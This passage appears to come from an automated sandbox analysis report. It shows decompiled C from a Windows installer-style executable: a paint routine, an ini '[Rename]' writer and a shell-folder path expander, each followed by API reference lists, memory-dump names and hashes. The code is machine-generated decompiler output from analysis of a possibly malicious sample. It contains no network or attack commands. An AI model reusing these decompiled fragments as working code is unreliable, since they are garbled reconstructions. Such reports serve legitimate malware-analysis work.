                                                                                    						_v32.bottom = _v32.bottom + 4;
                                                                                    						_a16 = _t87;
                                                                                    						FillRect(_a8,  &_v32, _t87);
                                                                                    						DeleteObject(_a16);
                                                                                    						_v32.top = _v32.top + 4;
                                                                                    					}
                                                                                    					if( *(_t130 + 0x58) != 0xffffffff) {
                                                                                    						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
                                                                                    						_a16 = _t94;
                                                                                    						if(_t94 != 0) {
                                                                                    							_t128 = _a8;
                                                                                    							_v32.left = 0x10;
                                                                                    							_v32.top = 8;
                                                                                    							SetBkMode(_t128, 1);
                                                                                    							SetTextColor(_t128,  *(_t130 + 0x58));
                                                                                    							_a8 = SelectObject(_t128, _a16);
                                                                                    							DrawTextA(_t128, 0x42e420, 0xffffffff,  &_v32, 0x820);
                                                                                    							SelectObject(_t128, _a8);
                                                                                    							DeleteObject(_a16);
                                                                                    						}
                                                                                    					}
                                                                                    					EndPaint(_a4,  &_v96);
                                                                                    					return 0;
                                                                                    				}
                                                                                    				_t102 = _a16;
                                                                                    				if(_a8 == 0x46) {
                                                                                    					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
                                                                                    					 *((intOrPtr*)(_t102 + 4)) =  *0x42ec28;
                                                                                    				}
                                                                                    				return DefWindowProcA(_a4, _a8, _a12, _t102);
                                                                                    			}













                                                                                    0x0040100a
                                                                                    0x00401039
                                                                                    0x00401047
                                                                                    0x0040104d
                                                                                    0x00401051
                                                                                    0x0040105b
                                                                                    0x00401061
                                                                                    0x00401064
                                                                                    0x004010f3
                                                                                    0x00401089
                                                                                    0x0040108c
                                                                                    0x004010a6
                                                                                    0x004010bd
                                                                                    0x004010cc
                                                                                    0x004010cf
                                                                                    0x004010d5
                                                                                    0x004010d9
                                                                                    0x004010e4
                                                                                    0x004010ed
                                                                                    0x004010ef
                                                                                    0x004010ef
                                                                                    0x00401100
                                                                                    0x00401105
                                                                                    0x0040110d
                                                                                    0x00401110
                                                                                    0x00401112
                                                                                    0x00401118
                                                                                    0x0040111f
                                                                                    0x00401126
                                                                                    0x00401130
                                                                                    0x00401142
                                                                                    0x00401156
                                                                                    0x00401160
                                                                                    0x00401165
                                                                                    0x00401165
                                                                                    0x00401110
                                                                                    0x0040116e
                                                                                    0x00000000
                                                                                    0x00401178
                                                                                    0x00401010
                                                                                    0x00401013
                                                                                    0x00401015
                                                                                    0x0040101f
                                                                                    0x0040101f
                                                                                    0x00000000

                                                                                    APIs
                                                                                    • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                                    • BeginPaint.USER32(?,?), ref: 00401047
                                                                                    • GetClientRect.USER32 ref: 0040105B
                                                                                    • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                    • FillRect.USER32 ref: 004010E4
                                                                                    • DeleteObject.GDI32(?), ref: 004010ED
                                                                                    • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                                    • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                    • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                    • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                    • DrawTextA.USER32(00000000,0042E420,000000FF,00000010,00000820), ref: 00401156
                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                    • DeleteObject.GDI32(?), ref: 00401165
                                                                                    • EndPaint.USER32(?,?), ref: 0040116E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.222449800.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.222443832.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222477557.0000000000407000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222494200.0000000000409000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222512461.0000000000420000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222518421.000000000042C000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222524983.0000000000434000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222535001.0000000000437000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                    • String ID: F
                                                                                    • API String ID: 941294808-1304234792
                                                                                    • Opcode ID: 05bbfc508ef237e24a9817a54f4a45d084594548d285a69524b208d70469c4e1
                                                                                    • Instruction ID: 9dd9d9e9de989eb397972ae7cf78bef649c8fbd879b4abede4b5176bd3adbacf
                                                                                    • Opcode Fuzzy Hash: 05bbfc508ef237e24a9817a54f4a45d084594548d285a69524b208d70469c4e1
                                                                                    • Instruction Fuzzy Hash: 08419D71804249AFCB058F95DD459BFBFB9FF44314F00802AF951AA1A0C738E951DFA5
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 93%
                                                                                    			E00405915(void* __eflags) {
                                                                                    				void* __ebx;
                                                                                    				void* __edi;
                                                                                    				void* __esi;
                                                                                    				intOrPtr* _t15;
                                                                                    				long _t16;
                                                                                    				int _t20;
                                                                                    				void* _t28;
                                                                                    				long _t29;
                                                                                    				intOrPtr* _t37;
                                                                                    				int _t43;
                                                                                    				void* _t44;
                                                                                    				long _t47;
                                                                                    				CHAR* _t49;
                                                                                    				void* _t51;
                                                                                    				void* _t53;
                                                                                    				intOrPtr* _t54;
                                                                                    				void* _t55;
                                                                                    				void* _t56;
                                                                                    
                                                                                    				_t15 = E00405F57(2);
                                                                                    				_t49 =  *(_t55 + 0x18);
                                                                                    				if(_t15 != 0) {
                                                                                    					_t20 =  *_t15( *(_t55 + 0x1c), _t49, 5);
                                                                                    					if(_t20 != 0) {
                                                                                    						L16:
                                                                                    						 *0x42ecb0 =  *0x42ecb0 + 1;
                                                                                    						return _t20;
                                                                                    					}
                                                                                    				}
                                                                                    				 *0x42c230 = 0x4c554e;
                                                                                    				if(_t49 == 0) {
                                                                                    					L5:
                                                                                    					_t16 = GetShortPathNameA( *(_t55 + 0x1c), 0x42bca8, 0x400);
                                                                                    					if(_t16 != 0 && _t16 <= 0x400) {
                                                                                    						_t43 = wsprintfA(0x42b8a8, "%s=%s\r\n", 0x42c230, 0x42bca8);
                                                                                    						_t56 = _t55 + 0x10;
                                                                                    						E00405BE9(_t43, 0x400, 0x42bca8, 0x42bca8,  *((intOrPtr*)( *0x42ec30 + 0x128)));
                                                                                    						_t20 = E0040589E(0x42bca8, 0xc0000000, 4);
                                                                                    						_t53 = _t20;
                                                                                    						 *(_t56 + 0x14) = _t53;
                                                                                    						if(_t53 == 0xffffffff) {
                                                                                    							goto L16;
                                                                                    						}
                                                                                    						_t47 = GetFileSize(_t53, 0);
                                                                                    						_t7 = _t43 + 0xa; // 0xa
                                                                                    						_t51 = GlobalAlloc(0x40, _t47 + _t7);
                                                                                    						if(_t51 == 0 || ReadFile(_t53, _t51, _t47, _t56 + 0x18, 0) == 0 || _t47 !=  *(_t56 + 0x18)) {
                                                                                    							L15:
                                                                                    							_t20 = CloseHandle(_t53);
                                                                                    							goto L16;
                                                                                    						} else {
                                                                                    							if(E00405813(_t51, "[Rename]\r\n") != 0) {
                                                                                    								_t28 = E00405813(_t26 + 0xa, 0x4093e4);
                                                                                    								if(_t28 == 0) {
                                                                                    									L13:
                                                                                    									_t29 = _t47;
                                                                                    									L14:
                                                                                    									E0040585F(_t51 + _t29, 0x42b8a8, _t43);
                                                                                    									SetFilePointer(_t53, 0, 0, 0);
                                                                                    									WriteFile(_t53, _t51, _t47 + _t43, _t56 + 0x18, 0);
                                                                                    									GlobalFree(_t51);
                                                                                    									goto L15;
                                                                                    								}
                                                                                    								_t37 = _t28 + 1;
                                                                                    								_t44 = _t51 + _t47;
                                                                                    								_t54 = _t37;
                                                                                    								if(_t37 >= _t44) {
                                                                                    									L21:
                                                                                    									_t53 =  *(_t56 + 0x14);
                                                                                    									_t29 = _t37 - _t51;
                                                                                    									goto L14;
                                                                                    								} else {
                                                                                    									goto L20;
                                                                                    								}
                                                                                    								do {
                                                                                    									L20:
                                                                                    									 *((char*)(_t43 + _t54)) =  *_t54;
                                                                                    									_t54 = _t54 + 1;
                                                                                    								} while (_t54 < _t44);
                                                                                    								goto L21;
                                                                                    							}
                                                                                    							E00405BC7(_t51 + _t47, "[Rename]\r\n");
                                                                                    							_t47 = _t47 + 0xa;
                                                                                    							goto L13;
                                                                                    						}
                                                                                    					}
                                                                                    				} else {
                                                                                    					CloseHandle(E0040589E(_t49, 0, 1));
                                                                                    					_t16 = GetShortPathNameA(_t49, 0x42c230, 0x400);
                                                                                    					if(_t16 != 0 && _t16 <= 0x400) {
                                                                                    						goto L5;
                                                                                    					}
                                                                                    				}
                                                                                    				return _t16;
                                                                                    			}





















                                                                                    0x0040591b
                                                                                    0x00405922
                                                                                    0x00405926
                                                                                    0x0040592f
                                                                                    0x00405933
                                                                                    0x00405a72
                                                                                    0x00405a72
                                                                                    0x00000000
                                                                                    0x00405a72
                                                                                    0x00405933
                                                                                    0x0040593f
                                                                                    0x00405955
                                                                                    0x0040597d
                                                                                    0x00405988
                                                                                    0x0040598c
                                                                                    0x004059ac
                                                                                    0x004059b3
                                                                                    0x004059bd
                                                                                    0x004059ca
                                                                                    0x004059cf
                                                                                    0x004059d4
                                                                                    0x004059d8
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004059e7
                                                                                    0x004059e9
                                                                                    0x004059f6
                                                                                    0x004059fa
                                                                                    0x00405a6b
                                                                                    0x00405a6c
                                                                                    0x00000000
                                                                                    0x00405a16
                                                                                    0x00405a23
                                                                                    0x00405a88
                                                                                    0x00405a8f
                                                                                    0x00405a36
                                                                                    0x00405a36
                                                                                    0x00405a38
                                                                                    0x00405a41
                                                                                    0x00405a4c
                                                                                    0x00405a5e
                                                                                    0x00405a65
                                                                                    0x00000000
                                                                                    0x00405a65
                                                                                    0x00405a91
                                                                                    0x00405a92
                                                                                    0x00405a97
                                                                                    0x00405a99
                                                                                    0x00405aa6
                                                                                    0x00405aa6
                                                                                    0x00405aaa
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00405a9b
                                                                                    0x00405a9b
                                                                                    0x00405a9e
                                                                                    0x00405aa1
                                                                                    0x00405aa2
                                                                                    0x00000000
                                                                                    0x00405a9b
                                                                                    0x00405a2e
                                                                                    0x00405a33
                                                                                    0x00000000
                                                                                    0x00405a33
                                                                                    0x004059fa
                                                                                    0x00405957
                                                                                    0x00405962
                                                                                    0x0040596b
                                                                                    0x0040596f
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040596f
                                                                                    0x00405a7c

                                                                                    APIs
                                                                                      • Part of subcall function 00405F57: GetModuleHandleA.KERNEL32(?,?,?,00403194,0000000D), ref: 00405F69
                                                                                      • Part of subcall function 00405F57: GetProcAddress.KERNEL32(00000000,?), ref: 00405F84
                                                                                    • CloseHandle.KERNEL32(00000000,?,00000000,00000001,00000002,?,00000000,?,?,004056AA,?,00000000,000000F1,?), ref: 00405962
                                                                                    • GetShortPathNameA.KERNEL32 ref: 0040596B
                                                                                    • GetShortPathNameA.KERNEL32 ref: 00405988
                                                                                    • wsprintfA.USER32 ref: 004059A6
                                                                                    • GetFileSize.KERNEL32(00000000,00000000,0042BCA8,C0000000,00000004,0042BCA8,?,?,?,00000000,000000F1,?), ref: 004059E1
                                                                                    • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 004059F0
                                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 00405A06
                                                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,0042B8A8,00000000,-0000000A,004093E4,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405A4C
                                                                                    • WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,000000F1,?), ref: 00405A5E
                                                                                    • GlobalFree.KERNEL32 ref: 00405A65
                                                                                    • CloseHandle.KERNEL32(00000000,?,?,00000000,000000F1,?), ref: 00405A6C
                                                                                      • Part of subcall function 00405813: lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405A21,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040581A
                                                                                      • Part of subcall function 00405813: lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405A21,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040584A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.222449800.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.222443832.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222477557.0000000000407000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222494200.0000000000409000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222512461.0000000000420000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222518421.000000000042C000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222524983.0000000000434000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222535001.0000000000437000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocFreeModulePointerProcReadSizeWritewsprintf
                                                                                    • String ID: %s=%s$[Rename]
                                                                                    • API String ID: 3445103937-1727408572
                                                                                    • Opcode ID: abd3264898386bb3dbc1ebc44b2e1273f6261c7b2a899847ebec775b355f104e
                                                                                    • Instruction ID: 64f3c6dc45b3b00a74ff67058550f3a5a1124089509923db9c5fc79d761d9fea
                                                                                    • Opcode Fuzzy Hash: abd3264898386bb3dbc1ebc44b2e1273f6261c7b2a899847ebec775b355f104e
                                                                                    • Instruction Fuzzy Hash: 8941E131B05B166BD3206B619D89F6B3A5CDF45755F04063AFD05F22C1EA3CA8008EBE
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 74%
                                                                                    			E00405BE9(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
                                                                                    				signed int _v8;
                                                                                    				struct _ITEMIDLIST* _v12;
                                                                                    				signed int _v16;
                                                                                    				signed char _v20;
                                                                                    				signed int _v24;
                                                                                    				signed char _v28;
                                                                                    				signed int _t36;
                                                                                    				CHAR* _t37;
                                                                                    				signed int _t39;
                                                                                    				int _t40;
                                                                                    				char _t50;
                                                                                    				char _t51;
                                                                                    				char _t53;
                                                                                    				char _t55;
                                                                                    				void* _t63;
                                                                                    				signed int _t69;
                                                                                    				signed int _t74;
                                                                                    				signed int _t75;
                                                                                    				char _t83;
                                                                                    				void* _t85;
                                                                                    				CHAR* _t86;
                                                                                    				void* _t88;
                                                                                    				signed int _t95;
                                                                                    				signed int _t97;
                                                                                    				void* _t98;
                                                                                    
                                                                                    				_t88 = __esi;
                                                                                    				_t85 = __edi;
                                                                                    				_t63 = __ebx;
                                                                                    				_t36 = _a8;
                                                                                    				if(_t36 < 0) {
                                                                                    					_t36 =  *( *0x42e3fc - 4 + _t36 * 4);
                                                                                    				}
                                                                                    				_t74 =  *0x42ec58 + _t36;
                                                                                    				_t37 = 0x42dbc0;
                                                                                    				_push(_t63);
                                                                                    				_push(_t88);
                                                                                    				_push(_t85);
                                                                                    				_t86 = 0x42dbc0;
                                                                                    				if(_a4 - 0x42dbc0 < 0x800) {
                                                                                    					_t86 = _a4;
                                                                                    					_a4 = _a4 & 0x00000000;
                                                                                    				}
                                                                                    				while(1) {
                                                                                    					_t83 =  *_t74;
                                                                                    					if(_t83 == 0) {
                                                                                    						break;
                                                                                    					}
                                                                                    					__eflags = _t86 - _t37 - 0x400;
                                                                                    					if(_t86 - _t37 >= 0x400) {
                                                                                    						break;
                                                                                    					}
                                                                                    					_t74 = _t74 + 1;
                                                                                    					__eflags = _t83 - 0xfc;
                                                                                    					_a8 = _t74;
                                                                                    					if(__eflags <= 0) {
                                                                                    						if(__eflags != 0) {
                                                                                    							 *_t86 = _t83;
                                                                                    							_t86 =  &(_t86[1]);
                                                                                    							__eflags = _t86;
                                                                                    						} else {
                                                                                    							 *_t86 =  *_t74;
                                                                                    							_t86 =  &(_t86[1]);
                                                                                    							_t74 = _t74 + 1;
                                                                                    						}
                                                                                    						continue;
                                                                                    					}
                                                                                    					_t39 =  *(_t74 + 1);
                                                                                    					_t75 =  *_t74;
                                                                                    					_t95 = (_t39 & 0x0000007f) << 0x00000007 | _t75 & 0x0000007f;
                                                                                    					_a8 = _a8 + 2;
                                                                                    					_v28 = _t75 | 0x00000080;
                                                                                    					_t69 = _t75;
                                                                                    					_v24 = _t69;
                                                                                    					__eflags = _t83 - 0xfe;
                                                                                    					_v20 = _t39 | 0x00000080;
                                                                                    					_v16 = _t39;
                                                                                    					if(_t83 != 0xfe) {
                                                                                    						__eflags = _t83 - 0xfd;
                                                                                    						if(_t83 != 0xfd) {
                                                                                    							__eflags = _t83 - 0xff;
                                                                                    							if(_t83 == 0xff) {
                                                                                    								__eflags = (_t39 | 0xffffffff) - _t95;
                                                                                    								E00405BE9(_t69, _t86, _t95, _t86, (_t39 | 0xffffffff) - _t95);
                                                                                    							}
                                                                                    							L41:
                                                                                    							_t40 = lstrlenA(_t86);
                                                                                    							_t74 = _a8;
                                                                                    							_t86 =  &(_t86[_t40]);
                                                                                    							_t37 = 0x42dbc0;
                                                                                    							continue;
                                                                                    						}
                                                                                    						__eflags = _t95 - 0x1d;
                                                                                    						if(_t95 != 0x1d) {
                                                                                    							__eflags = (_t95 << 0xa) + 0x42f000;
                                                                                    							E00405BC7(_t86, (_t95 << 0xa) + 0x42f000);
                                                                                    						} else {
                                                                                    							E00405B25(_t86,  *0x42ec28);
                                                                                    						}
                                                                                    						__eflags = _t95 + 0xffffffeb - 7;
                                                                                    						if(_t95 + 0xffffffeb < 7) {
                                                                                    							L32:
                                                                                    							E00405E29(_t86);
                                                                                    						}
                                                                                    						goto L41;
                                                                                    					}
                                                                                    					_t97 = 2;
                                                                                    					_t50 = GetVersion();
                                                                                    					__eflags = _t50;
                                                                                    					if(_t50 >= 0) {
                                                                                    						L12:
                                                                                    						_v8 = 1;
                                                                                    						L13:
                                                                                    						__eflags =  *0x42eca4;
                                                                                    						if( *0x42eca4 != 0) {
                                                                                    							_t97 = 4;
                                                                                    						}
                                                                                    						__eflags = _t69;
                                                                                    						if(_t69 >= 0) {
                                                                                    							__eflags = _t69 - 0x25;
                                                                                    							if(_t69 != 0x25) {
                                                                                    								__eflags = _t69 - 0x24;
                                                                                    								if(_t69 == 0x24) {
                                                                                    									GetWindowsDirectoryA(_t86, 0x400);
                                                                                    									_t97 = 0;
                                                                                    								}
                                                                                    								while(1) {
                                                                                    									__eflags = _t97;
                                                                                    									if(_t97 == 0) {
                                                                                    										goto L29;
                                                                                    									}
                                                                                    									_t51 =  *0x42ec24;
                                                                                    									_t97 = _t97 - 1;
                                                                                    									__eflags = _t51;
                                                                                    									if(_t51 == 0) {
                                                                                    										L25:
                                                                                    										_t53 = SHGetSpecialFolderLocation( *0x42ec28,  *(_t98 + _t97 * 4 - 0x18),  &_v12);
                                                                                    										__eflags = _t53;
                                                                                    										if(_t53 != 0) {
                                                                                    											L27:
                                                                                    											 *_t86 =  *_t86 & 0x00000000;
                                                                                    											__eflags =  *_t86;
                                                                                    											continue;
                                                                                    										}
                                                                                    										__imp__SHGetPathFromIDListA(_v12, _t86);
                                                                                    										__imp__CoTaskMemFree(_v12);
                                                                                    										__eflags = _t53;
                                                                                    										if(_t53 != 0) {
                                                                                    											goto L29;
                                                                                    										}
                                                                                    										goto L27;
                                                                                    									}
                                                                                    									__eflags = _v8;
                                                                                    									if(_v8 == 0) {
                                                                                    										goto L25;
                                                                                    									}
                                                                                    									_t55 =  *_t51( *0x42ec28,  *(_t98 + _t97 * 4 - 0x18), 0, 0, _t86);
                                                                                    									__eflags = _t55;
                                                                                    									if(_t55 == 0) {
                                                                                    										goto L29;
                                                                                    									}
                                                                                    									goto L25;
                                                                                    								}
                                                                                    								goto L29;
                                                                                    							}
                                                                                    							GetSystemDirectoryA(_t86, 0x400);
                                                                                    							goto L29;
                                                                                    						} else {
                                                                                    							_t72 = (_t69 & 0x0000003f) +  *0x42ec58;
                                                                                    							E00405AAE(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t69 & 0x0000003f) +  *0x42ec58, _t86, _t69 & 0x00000040);
                                                                                    							__eflags =  *_t86;
                                                                                    							if( *_t86 != 0) {
                                                                                    								L30:
                                                                                    								__eflags = _v16 - 0x1a;
                                                                                    								if(_v16 == 0x1a) {
                                                                                    									lstrcatA(_t86, "\\Microsoft\\Internet Explorer\\Quick Launch");
                                                                                    								}
                                                                                    								goto L32;
                                                                                    							}
                                                                                    							E00405BE9(_t72, _t86, _t97, _t86, _v16);
                                                                                    							L29:
                                                                                    							__eflags =  *_t86;
                                                                                    							if( *_t86 == 0) {
                                                                                    								goto L32;
                                                                                    							}
                                                                                    							goto L30;
                                                                                    						}
                                                                                    					}
                                                                                    					__eflags = _t50 - 0x5a04;
                                                                                    					if(_t50 == 0x5a04) {
                                                                                    						goto L12;
                                                                                    					}
                                                                                    					__eflags = _v16 - 0x23;
                                                                                    					if(_v16 == 0x23) {
                                                                                    						goto L12;
                                                                                    					}
                                                                                    					__eflags = _v16 - 0x2e;
                                                                                    					if(_v16 == 0x2e) {
                                                                                    						goto L12;
                                                                                    					} else {
                                                                                    						_v8 = _v8 & 0x00000000;
                                                                                    						goto L13;
                                                                                    					}
                                                                                    				}
                                                                                    				 *_t86 =  *_t86 & 0x00000000;
                                                                                    				if(_a4 == 0) {
                                                                                    					return _t37;
                                                                                    				}
                                                                                    				return E00405BC7(_a4, _t37);
                                                                                    			}




























                                                                                    0x00405be9
                                                                                    0x00405be9
                                                                                    0x00405be9
                                                                                    0x00405bef
                                                                                    0x00405bf4
                                                                                    0x00405c05
                                                                                    0x00405c05
                                                                                    0x00405c10
                                                                                    0x00405c12
                                                                                    0x00405c17
                                                                                    0x00405c1a
                                                                                    0x00405c1b
                                                                                    0x00405c22
                                                                                    0x00405c24
                                                                                    0x00405c2a
                                                                                    0x00405c2d
                                                                                    0x00405c2d
                                                                                    0x00405e06
                                                                                    0x00405e06
                                                                                    0x00405e0a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00405c3a
                                                                                    0x00405c40
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00405c46
                                                                                    0x00405c47
                                                                                    0x00405c4a
                                                                                    0x00405c4d
                                                                                    0x00405df9
                                                                                    0x00405e03
                                                                                    0x00405e05
                                                                                    0x00405e05
                                                                                    0x00405dfb
                                                                                    0x00405dfd
                                                                                    0x00405dff
                                                                                    0x00405e00
                                                                                    0x00405e00
                                                                                    0x00000000
                                                                                    0x00405df9
                                                                                    0x00405c53
                                                                                    0x00405c57
                                                                                    0x00405c67
                                                                                    0x00405c6b
                                                                                    0x00405c72
                                                                                    0x00405c75
                                                                                    0x00405c79
                                                                                    0x00405c7f
                                                                                    0x00405c82
                                                                                    0x00405c85
                                                                                    0x00405c88
                                                                                    0x00405da3
                                                                                    0x00405da6
                                                                                    0x00405dd6
                                                                                    0x00405dd9
                                                                                    0x00405dde
                                                                                    0x00405de2
                                                                                    0x00405de2
                                                                                    0x00405de7
                                                                                    0x00405de8
                                                                                    0x00405ded
                                                                                    0x00405df0
                                                                                    0x00405df2
                                                                                    0x00000000
                                                                                    0x00405df2
                                                                                    0x00405da8
                                                                                    0x00405dab
                                                                                    0x00405dc0
                                                                                    0x00405dc7
                                                                                    0x00405dad
                                                                                    0x00405db4
                                                                                    0x00405db4
                                                                                    0x00405dcf
                                                                                    0x00405dd2
                                                                                    0x00405d9b
                                                                                    0x00405d9c
                                                                                    0x00405d9c
                                                                                    0x00000000
                                                                                    0x00405dd2
                                                                                    0x00405c90
                                                                                    0x00405c91
                                                                                    0x00405c97
                                                                                    0x00405c99
                                                                                    0x00405cb3
                                                                                    0x00405cb3
                                                                                    0x00405cba
                                                                                    0x00405cba
                                                                                    0x00405cc1
                                                                                    0x00405cc5
                                                                                    0x00405cc5
                                                                                    0x00405cc6
                                                                                    0x00405cc8
                                                                                    0x00405d01
                                                                                    0x00405d04
                                                                                    0x00405d14
                                                                                    0x00405d17
                                                                                    0x00405d1f
                                                                                    0x00405d25
                                                                                    0x00405d25
                                                                                    0x00405d81
                                                                                    0x00405d81
                                                                                    0x00405d83
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00405d29
                                                                                    0x00405d30
                                                                                    0x00405d31
                                                                                    0x00405d33
                                                                                    0x00405d4d
                                                                                    0x00405d5b
                                                                                    0x00405d61
                                                                                    0x00405d63
                                                                                    0x00405d7e
                                                                                    0x00405d7e
                                                                                    0x00405d7e
                                                                                    0x00000000
                                                                                    0x00405d7e
                                                                                    0x00405d69
                                                                                    0x00405d74
                                                                                    0x00405d7a
                                                                                    0x00405d7c
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00405d7c
                                                                                    0x00405d35
                                                                                    0x00405d38
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00405d47
                                                                                    0x00405d49
                                                                                    0x00405d4b
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00405d4b
                                                                                    0x00000000
                                                                                    0x00405d81
                                                                                    0x00405d0c
                                                                                    0x00000000
                                                                                    0x00405cca
                                                                                    0x00405ccf
                                                                                    0x00405ce5
                                                                                    0x00405cea
                                                                                    0x00405ced
                                                                                    0x00405d8a
                                                                                    0x00405d8a
                                                                                    0x00405d8e
                                                                                    0x00405d96
                                                                                    0x00405d96
                                                                                    0x00000000
                                                                                    0x00405d8e
                                                                                    0x00405cf7
                                                                                    0x00405d85
                                                                                    0x00405d85
                                                                                    0x00405d88
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00405d88
                                                                                    0x00405cc8
                                                                                    0x00405c9b
                                                                                    0x00405c9f
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00405ca1
                                                                                    0x00405ca5
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00405ca7
                                                                                    0x00405cab
                                                                                    0x00000000
                                                                                    0x00405cad
                                                                                    0x00405cad
                                                                                    0x00000000
                                                                                    0x00405cad
                                                                                    0x00405cab
                                                                                    0x00405e10
                                                                                    0x00405e1a
                                                                                    0x00405e26
                                                                                    0x00405e26
                                                                                    0x00000000

                                                                                    APIs
                                                                                    • GetVersion.KERNEL32(?,00429878,00000000,00404EEB,00429878,00000000), ref: 00405C91
                                                                                    • GetSystemDirectoryA.KERNEL32 ref: 00405D0C
                                                                                    • GetWindowsDirectoryA.KERNEL32(Fdskdfkdsfsdfdsf,00000400), ref: 00405D1F
                                                                                    • SHGetSpecialFolderLocation.SHELL32(?,0041AF03), ref: 00405D5B
                                                                                    • SHGetPathFromIDListA.SHELL32(0041AF03,Fdskdfkdsfsdfdsf), ref: 00405D69
                                                                                    • CoTaskMemFree.OLE32(0041AF03), ref: 00405D74
                                                                                    • lstrcatA.KERNEL32(Fdskdfkdsfsdfdsf,\Microsoft\Internet Explorer\Quick Launch), ref: 00405D96
                                                                                    • lstrlenA.KERNEL32(Fdskdfkdsfsdfdsf,?,00429878,00000000,00404EEB,00429878,00000000), ref: 00405DE8
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.222449800.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.222443832.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222477557.0000000000407000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222494200.0000000000409000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222512461.0000000000420000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222518421.000000000042C000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222524983.0000000000434000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222535001.0000000000437000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                    • String ID: Fdskdfkdsfsdfdsf$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                    • API String ID: 900638850-3531331202
                                                                                    • Opcode ID: dad9380ef75d4ee6d1e7f44bcb98c3f3aee458906992b83e7d16e4410c3c70ab
                                                                                    • Instruction ID: 131396e9090e0f007f21196dc47e10b2e1a614011cd8a075e276219472c4ac8b
                                                                                    • Opcode Fuzzy Hash: dad9380ef75d4ee6d1e7f44bcb98c3f3aee458906992b83e7d16e4410c3c70ab
                                                                                    • Instruction Fuzzy Hash: EA510531A04A04ABEB215B65DC88BBF3BA4DF05714F10823BE911B62D1D73C59429E5E
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E00405E29(CHAR* _a4) {
                                                                                    				char _t5;
                                                                                    				char _t7;
                                                                                    				char* _t15;
                                                                                    				char* _t16;
                                                                                    				CHAR* _t17;
                                                                                    
                                                                                    				_t17 = _a4;
